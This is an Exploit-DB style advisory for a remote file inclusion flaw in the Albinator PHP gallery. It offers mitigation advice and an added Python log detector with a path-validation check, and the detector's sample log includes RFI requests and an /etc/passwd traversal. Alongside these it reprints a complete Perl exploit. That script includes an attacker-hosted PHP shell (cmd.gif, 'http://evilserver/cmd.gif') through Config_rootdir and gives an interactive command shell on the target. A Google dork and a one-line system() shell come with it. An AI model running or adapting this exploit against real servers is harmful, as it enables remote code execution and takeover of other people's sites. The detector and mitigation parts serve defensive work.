Vendor: Albinator
By: VietMafia and r0t, webDEViL w3bd3vil[at]gmail.com
CVSS: 7.5 (HIGH)
Type: Remote File Inclusion
CWE: 98 (Improper Control of Filename for Include/Require Statement in PHP Program)
Product Name: Albinator
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux, Windows, Mac

Albinator Multiple Parameter File Inclusion

Albinator Multiple Parameter File Inclusion is a remote file inclusion (RFI) vulnerability: the Config_rootdir parameter of eshow.php (and likewise eday.php and forgot.php) is used to build an include path without any validation, so on a PHP installation that allows URL includes an attacker can point it at a file hosted on a server they control and have the web server fetch and execute that file as PHP. The bug was found by VietMafia and r0t; the exploit below, by webDEViL w3bd3vil[at]gmail.com, reuses the code of the Fast Click <= 2.3.8 Remote File Inclusion exploit. It is a Perl script that sends a GET request of the form eshow.php?Config_rootdir=http://<attacker host>/cmd.gif?&<variable>=<command>, where the remote file holds a one-line PHP shell such as <?system($cmd);?> that reads its command from the named GET variable. The trailing ? after the remote file name makes anything the script appends to the path part of the query string sent to the attacker's server rather than part of the file name. Every command typed at the script's prompt is executed on the target with the privileges of the web server process and its output is printed back, giving the attacker arbitrary command execution.

Mitigation:

No vendor patch is listed. The root fix is to stop deriving include paths from request data: the affected scripts should take Config_rootdir from their own configuration and set it before use rather than accepting it from the request. Where user input genuinely has to select a file, resolve it against a fixed directory, reject any value containing a URL scheme, a ".." component or a NUL byte, and compare the resolved path against the allowed root before including it. At the PHP level, disable allow_url_include (and allow_url_fopen where it is not needed) so that include() cannot fetch remote code at all, and turn off display_errors, since the exploit relies on messages such as "failed to open stream" to tell a failed include from a successful one. Web server rules that merely restrict file extensions do not help here: the included file is executed as PHP whatever its name, which is why the exploit hosts the shell as cmd.gif.
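The request shape described above and the path check the mitigation calls for, as an added example (not part of the advisory or of Albinator's own code): a small Python detector that scans access-log lines for Config_rootdir values pointing at a URL, recovers the command the attacker passed to the included shell, and a safe_rootdir() function showing the resolve-under-a-fixed-root check a fixed script would apply. It goes beyond the page by also flagging ../ traversal values. The log lines, addresses and the allowed root /var/www/albinator are constructed for the example.

```python
"""Detect Albinator-style Config_rootdir inclusion attempts in access logs
and show the path check a fix would apply.  Added example; the log lines
below are constructed, not real traffic."""
import posixpath
import re
from urllib.parse import parse_qsl, urlsplit

# Scripts the advisory names: eshow.php can be swapped for eday.php or forgot.php.
VULNERABLE_SCRIPTS = {"eshow.php", "eday.php", "forgot.php"}
INCLUDE_PARAM = "Config_rootdir"

# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
URL_SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.I)


def classify_include_value(value):
    """'remote' for a URL (the RFI case), 'traversal' for a ../ path, else 'local'.

    Takes the already percent-decoded value, as PHP's $_GET would hold it."""
    if URL_SCHEME_RE.match(value):
        return "remote"
    if ".." in value.replace("\\", "/").split("/"):
        return "traversal"
    return "local"


def analyze_request(target):
    """Parse one request target; return a finding dict for a suspicious
    Config_rootdir, or None when the request is not an inclusion attempt."""
    parts = urlsplit(target)
    script = parts.path.rsplit("/", 1)[-1]
    if script not in VULNERABLE_SCRIPTS:
        return None
    params = dict(parse_qsl(parts.query, keep_blank_values=True))
    if INCLUDE_PARAM not in params:
        return None
    kind = classify_include_value(params[INCLUDE_PARAM])
    if kind == "local":
        return None
    # Whatever else is in the query is what the included shell reads ($_GET[cmd]).
    extra = {k: v for k, v in params.items() if k != INCLUDE_PARAM}
    return {"script": script, "kind": kind,
            "include": params[INCLUDE_PARAM], "args": extra}


def scan_log(text):
    """Run analyze_request over each log line; attach the client IP."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        finding = analyze_request(m.group("target"))
        if finding:
            finding["ip"] = line.split(" ", 1)[0]
            findings.append(finding)
    return findings


def safe_rootdir(value, allowed_root="/var/www/albinator"):
    """The check the vulnerable scripts lack: resolve Config_rootdir under a
    fixed directory and refuse URLs, NUL bytes and anything escaping it.
    Returns the resolved path, or None to reject (allowed_root is hypothetical)."""
    if "\x00" in value or URL_SCHEME_RE.match(value):
        return None
    resolved = posixpath.normpath(posixpath.join(allowed_root, value))
    if resolved == allowed_root or resolved.startswith(allowed_root + "/"):
        return resolved
    return None


# Constructed sample log (RFC 5737 addresses): the first two lines mirror the
# request the Perl exploit builds, the third is benign, the last a traversal.
SAMPLE_LOG = """\
203.0.113.7 - - [03/May/2006:10:15:02 +0000] "GET /albinator/eshow.php?Config_rootdir=http://192.0.2.9/cmd.gif?&cmd=id HTTP/1.0" 200 512
203.0.113.7 - - [03/May/2006:10:15:09 +0000] "GET /albinator/eday.php?Config_rootdir=http://192.0.2.9/cmd.gif?&cmd=uname%20-a HTTP/1.0" 200 640
198.51.100.4 - - [03/May/2006:10:16:00 +0000] "GET /albinator/eshow.php?Config_rootdir=themes/default HTTP/1.1" 200 2048
198.51.100.4 - - [03/May/2006:10:16:30 +0000] "GET /albinator/forgot.php?Config_rootdir=../../../../etc/passwd%00 HTTP/1.1" 200 300
"""

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']} {f['script']} {f['kind']} include={f['include']!r} args={f['args']}")
    for v in ("themes/default", "http://192.0.2.9/cmd.gif?", "../../../../etc/passwd"):
        print(f"{v!r} -> {safe_rootdir(v)}")
```

Feed real logs to scan_log() as text; the detector keys on the three script names and the Config_rootdir parameter, so a renamed or moved install needs those two constants adjusted. safe_rootdir() works on the decoded value only, so it should be applied exactly where the PHP script would otherwise use $_GET['Config_rootdir'].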

Exploit-DB raw data:

#!/usr/bin/perl
##
# Albinator Multiple Parameter File Inclusion
# Bug discovered by VietMafia and r0t
# code copier: webDEViL w3bd3vil[at]gmail.com
# code same as Fast Click <= 2.3.8 Remote File Inclusion exploit
# Dork: "powered by Albinator "
# usage:
# perl wb.pl <target> <cmd shell location> <cmd shell variable>
# perl wb.pl http://vulnerable.com/ http://target.com/cmd.gif cmd
# cmd shell example: <?system($cmd);?>
# cmd shell variable: ($_GET[cmd]);

use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request;
use URI::Escape qw(uri_escape);

my $Path      = $ARGV[0];   # base URL of the Albinator install, with trailing /
my $Pathtocmd = $ARGV[1];   # URL of the attacker-hosted PHP shell
my $cmdv      = $ARGV[2];   # GET variable the shell reads its command from

usage() if !defined $Path      || $Path      !~ m{^https?://}
        || !defined $Pathtocmd || $Pathtocmd !~ m{^https?://}
        || !$cmdv;

head();

my $ua = LWP::UserAgent->new() or die "Could not create user agent\n";

# Interactive pseudo-shell: each line typed is sent as the value of the
# shell's command variable, appended to the included remote URL.
print "[shell] \$";
while (my $cmd = <STDIN>) {
    chomp($cmd);

    if ($cmd eq '') {
        print "\nPlease Enter a Command\n\n[shell] \$";
        next;
    }

    # Config_rootdir is included without validation, so the remote URL is
    # fetched and executed as PHP; the trailing '?' turns whatever the script
    # appends into a query string, and '&<cmdv>=<cmd>' reaches the shell's $_GET.
    ## can change eshow.php to eday.php or forgot.php
    my $url = $Path . 'eshow.php?Config_rootdir=' . $Pathtocmd . '?&'
            . $cmdv . '=' . uri_escape($cmd);
    my $res = $ua->request(HTTP::Request->new(GET => $url))
        or die "\nCould Not connect\n";
    my $return = $res->content;

    # PHP's own error text tells a failed include from a working shell.
    if ($return =~ /failed to open stream: HTTP request failed!/
        || $return =~ /: Cannot execute a blank command in <b>/) {
        print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";
        exit;
    }
    elsif ($return =~ /^<br.\/>.<b>Fatal.error/) {
        print "\nInvalid Command or No Return\n\n";
    }

    print "\r\n$return\n\r";
    print "[shell] \$";
}

sub head {
    print "\n============================================================================\r\n";
    print " Albinator Multiple Parameter File Inclusion\r\n";
    print "============================================================================\r\n";
}

sub usage {
    head();
    print " Usage: perl wb.pl <target> <cmd shell location> <cmd shell variable>\r\n\n";
    print " <Site> - Full path to Albinator ex: http://www.site.com/ \r\n";
    print " <cmd shell> - Path to cmd Shell e.g http://evilserver/cmd.gif \r\n";
    print " <cmd variable> - Command variable used in php shell \r\n";
    print "============================================================================\r\n";
    print "                          webDEViL w3bd3vil[at]gmail.com \r\n";
    print "============================================================================\r\n";
    exit();
}

# milw0rm.com [2006-05-03]